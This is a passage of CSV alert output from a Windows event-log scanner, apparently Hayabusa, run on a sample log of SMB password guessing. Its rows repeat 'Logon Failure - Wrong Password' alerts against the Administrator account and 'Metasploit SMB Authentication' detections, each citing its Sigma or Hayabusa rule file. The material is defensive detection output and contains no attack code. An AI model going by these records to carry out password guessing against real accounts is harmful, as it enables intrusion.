Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
